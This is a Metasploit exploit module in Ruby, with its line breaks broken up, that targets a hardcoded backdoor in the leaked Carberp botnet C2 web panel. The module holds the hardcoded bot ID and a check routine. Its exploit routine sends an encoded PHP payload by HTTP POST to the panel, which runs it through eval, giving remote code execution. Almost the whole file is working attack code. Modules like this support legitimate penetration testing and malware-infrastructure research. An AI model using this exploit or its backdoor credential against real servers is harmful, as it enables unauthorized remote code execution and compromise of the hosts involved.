##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def
initialize(info={})
super
(update_info(info,
'Name'
=>
'Carberp Web Panel C2 Backdoor Remote PHP Code Execution'
,
'Description'
=> %q{
This
module
exploits backdoors that can be sighted all over the leaked
source code of the Carberp botnet
C2
Web Panel.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'bwall(Brian Wallace) <bwallace[at]cylance.com>'
,
# msf module
'connection(Luis Santana) <hacktalkblog[at]gmail.com>'
,
# exploit reporting
'Steven K <xylitol[at]malwareint[d0t]com>'
# discovery and reporting
],
'References'
=>
[
],
'Privileged'
=>
false
,
'Payload'
=>
{
'Keys'
=> [
'php'
],
'Space'
=>
10000
,
'DisableNops'
=>
true
},
'Platform'
=> [
'php'
],
'Arch'
=>
ARCH_PHP
,
'Targets'
=>
[
[
'carberp'
, {}]
],
'DisclosureDate'
=>
'Jun 28 2013'
,
'DefaultTarget'
=>
0
))
register_options(
[
OptString.
new
(
'TARGETURI'
,[
true
,
"The path to the backdoor, often just index.php"
,
"/index.php"
]),
OptString.
new
(
'BOTID'
, [
true
,
'Hardcoded backdoor bot ID that can run PHP eval'
,
'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV'
]),
],
self
.
class
)
end
def
check
confirm_string = rand_text_alpha(
8
)
cmd =
"echo '#{confirm_string}';"
shell = http_send_command(cmd)
check_code = Exploit::CheckCode::Safe
if
shell
and
shell.body.include?(confirm_string)
check_code = Exploit::CheckCode::Vulnerable
end
check_code
end
def
http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s)
request_parameters = {
'method'
=>
'POST'
,
'uri'
=> uri,
'vars_post'
=>
{
'id'
=> datastore[
'BOTID'
],
"data"
=> Rex::Text.encode_base64(cmd.unpack(
'H*'
))
}
}
res = send_request_cgi(request_parameters)
res
end
def
exploit
http_send_command(payload.encoded)
end
end